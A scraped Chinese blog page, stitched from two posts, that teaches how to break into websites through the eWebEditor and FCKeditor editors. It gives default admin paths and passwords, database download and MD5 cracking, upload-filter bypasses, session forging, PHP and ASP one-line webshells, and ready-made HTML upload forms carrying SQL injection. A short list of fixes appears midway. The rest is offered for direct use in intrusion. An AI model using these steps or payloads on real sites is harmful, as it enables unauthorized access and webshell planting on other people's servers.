401 - Unauthorized: Access is denied due to invalid credentials.
401 - Unauthorized: Access is denied due to invalid credentials.
You do not have permission to view this directory or page using the credentials that you supplied.& Ewebeditor/ASP/ASPX/PHP各版本漏洞
Ewebeditor/ASP/ASPX/PHP各版本漏洞
eWebEditorTM 是什么？ 在线HTML编辑器！
eWebEditor 是基于浏览器的、所见即所得的在线HTML编辑器。她能够在网页上实现许多桌面编辑软件（如：Word）所具有的强大可视编辑功能。WEB开发人员可以用她把传统的多行文本输入框&TEXTAREA&替换为可视化的富文本输入框，使最终用户可以可视化的发布HTML格式的网页内容。 eWebEditor!已基本成为网站内容管理发布的必备工具！
如果有兴趣的话去官方了解详情：
先说重点吧，这个编辑器按脚本分主要有3个版本，ASP/ASPX/PHP/ 每个版本都可以利用的
先说下FCKeditor的:
/admin/FCKeditor/editor/filemanager/browser/default/browser.html?type=image&connector=connectors/asp/connector.asp
可建目录。
这个版本其实个人感觉是影响最大，使用最多的一个了吧，早期很多asp站都用这个，当然现在也是大量的存在的。。。
怎么利用呢？一般用这个的默认后台的URL都是默认的：
而且账户和密码也基本都是默认的：admin admin
对于找这个路径还有个简单的方法，就是在他站上新闻或者其他板块上找图片，看图片的URL也是可以找到的，不明白的自己试下就知道了
还有如果默认的账户和密码修改了，我们可以下载他的数据库，然后本地破解MD5了
默认数据库：
…/db/ewebeditor.mdb 或者 …/db/ewebeditor.asp
一般下载数据库后打开察看就可以了，然后后台登陆，新加样式。。。上传ASA马。。。
有的站数据库设置了只读属性，这样的站你是无法新加样式的，这样的站你可以看他数据库里的样式设置情况，一般很多时候都是让人给拿过的，而且明显的asa在那里。。。呵呵，这样的话就可以直接构造一个调用这个样式的连接来上传shell
比如发现数据库里有样式 123 他设置的是可以上传asa的话
那么就可以这样调用：
这样就可以直接上传了，然后在点“编辑”就会找到shell的路径了
其实这个漏洞主要是upload.asp的过滤不严造成的，新版的应该都修复了，具体受影响的版本我也没统计过
另外在公布另外一个ewebeditor的漏洞
漏洞文件:Admin_Private.asp
If Session(“eWebEditor_User”) = “” Then
Response.Redirect “admin_login.asp”
Response.End
只判断了session，没有判断cookies和路径的验证问题。
新建一个mrchen.asp内容如下:
&%Session(“eWebEditor_User”) = “43;%&
访问mrchen.asp，再访问后台任何文件，for example:Admin_Default.asp
这个拿shell的方法就简单了，不详细说了
受影响文件：eWebEditorNet/upload.aspx
利用方法：添好本地的cer的Shell文件。在浏揽器输入javascript:lbtnUpload.click();就能得到shell,具体大家自己尝试，不明白的联系我，或者留言
/ftb.imagegallery.aspx?frame=1&rif=..&cif=\..\..\..\..\..\..\.. 可以浏览目录。
关于eWebEditor 漏洞php版本的和asp的一样。有目录浏览。和编辑扩展名。重点在于虽然支持了php格式但上传还是上传不了。不过利用织梦的gif89a漏洞倒可以实现php一句话上传，然后再上传webshell。
备注：织梦的gif89a漏洞，准确来说应该是DEDECMS中所用的php版的FCKeditor存在上传漏洞，gif89a文件头欺骗。DEDECMS中在上传拖上没有对picSubmit进行任何处理。但是却不能直接上传php马。因为会识别。使用修改过的php小马。
phpinfo();
eval($_POST);
利用gif89a进行了欺骗。现在上传就可以成功了.然后有php一句话客户端连接.
影响版本：漏洞存在于ewebeditor jsp版 1.4以下版本，漏洞有两个版本。
原理：第一个是使用savefile.jsp来进行文件上传操作的，从代码中可以看出，程序并没做任何上传过滤，这样我们就可以直接上传一个JSPShell了。另一个版本可能是被人修改过，把代码转成了servlet，不能看到代码，但是利用方法却大同小异。
利用方法：我们先找一个1.4版本以下的ewebeditor JSP上传页面，选择好一个JSPShell。这个ewebeditor是没有提交按钮的，所以这里涉及到一个小技巧，就是在上传的对话框中敲下回车，大约过半分钟，就可以查看网页的源文件来寻找我们的Webshell了。
1.修改admin密码；
2.upload.asp中的：
“任何情?下都不允许上传asp脚本文件sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
“任何情?下都不允许上传asp脚本文件
sAllowExt = Replace(UCase(sAllowExt), “ASP”, “”)
sAllowExt = Replace(UCase(sAllowExt), “ASA”, “”)
sAllowExt = Replace(UCase(sAllowExt), “CER”, “”)
sAllowExt = Replace(UCase(sAllowExt), “AASPSP”, “”)
sAllowExt = Replace(UCase(sAllowExt), “CDX”, “”)
sAllowExt = Replace(UCase(sAllowExt), “HTR”, “”)
3. Admin_Private.asp：
If Session(”eWebEditor_User”) = “” Then
Response. Redirect “admin_login.asp”
Response. End
If Session(”eWebEditor_User”) = “” and IsSelfRefer() Then
Response.Redirect “admin_login.asp”
Response.End
4.将db/ewebeditor.mdb数据库文件名改为其他包含#等字符的文件名；
5. 将IIS中的“应用文件映射”中的“asp”删除；
6. 仍有问题删除admin_login.asp文件。
Tags: ewebeditor, asp, php, aspx, jsp
007安全新浪微博：
007安全QQ群:利用ewebeditor编辑器入侵网站教程 | 七行者博客
利用ewebeditor编辑器入侵网站教程
eWebEditor编辑器
建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理
默认后台地址：/ewebeditor/admin_login.asp
默认后台地址：/admin/eWebEditor/Admin_Login.asp
默认后台地址：/admin/WebEditor/Admin_Login.asp
默认后台地址：/admin/Editor/Admin_Login.asp
php默认后台地址:taivid_admin/eWebEditor/admin/login.php
使用默认密码：admin/admin 或 admin/admin888
不行就默认数据库路径 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
拿webshell方法第一种方法
登陆后台点击“样式管理”-选择新增样式
只写这几样 大家照做就行了
样式名称:qxz 随便写
路径模式：选择绝对路径
图片类型：gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了
上传路径：写上这个admin/ 或写/ 免的别人把UploadFile/目录删了 我们找不到马
内容路径：空 记得
图片限制：写上1000 免的上不了我们的asp木马
然后我们就可以提交了
就可以看到样式增加成功！
然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击
然后上传我们的刚才添加的格式的木马
拿webshell方法第二种方法
登陆后台，点击修改密码—新密码设置为 1″:eval request(“qxz”)’
设置成功后，访问asp/config.asp文件即可，一句话木马被写入到这个文件里面了.
然后用一句话客户端连接
拿webshell方法第三种方法
ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell
下载教程看
拿webshell方法第四种方法
利用ewebeditor asp版 2.1.6 上传漏洞利用程序
首先先看eWebEditor/upload.asp 上传地址存在不
存在的话就把下面的代码保存为
H1&ewebeditor asp版 2.1.6 上传漏洞利用程序—-&/H1&&br&&br&
&form action=”这里写上传地址?action=save&type=IMAGE&style=luoye’ union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|cer’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=’standard’and’a’=’a” method=post name=myform enctype=”multipart/form-data”&
&input type=file name=uploadfile size=100&&br&&br&
&input type=submit value=Fuck&
改上传地址保存为qxz.htm文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第五种方法
ewebeditor 鸡肋的上传漏洞
首先先看下ewebeditor/asp/upload.asp 上传地址存在不
把下面的代码
&form action=”这里写上传地址?action=savetype=image&style=popup&cusdir=a.asp” method=post name=myform enctype=”multipart/form-data”&
&input type=file name=uploadfile size=100&&br&&br&
&input type=submit value=upload&
然后保存为qxz.html
打开可以直接上传gif文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第六种方法
利用eWebEditor/upload.asp
抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如qxz.txt
然后用编译C32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80&qxz.txt
不懂抓包和nc上传 百度搜索相关教程
回头说下有时候进了个网站后台-看到了eWebEditor编辑器 但是找不到eWebEditor目录地址
我们来点鼠标右键-查看源代码，找到仔细找eWebEditor的路径。
本文固定链接:
【上一篇】【下一篇】
您可能还会对这些文章感兴趣！
2017年六月
12131415161718
19202122232425
2627282930
最新日志热评日志随机日志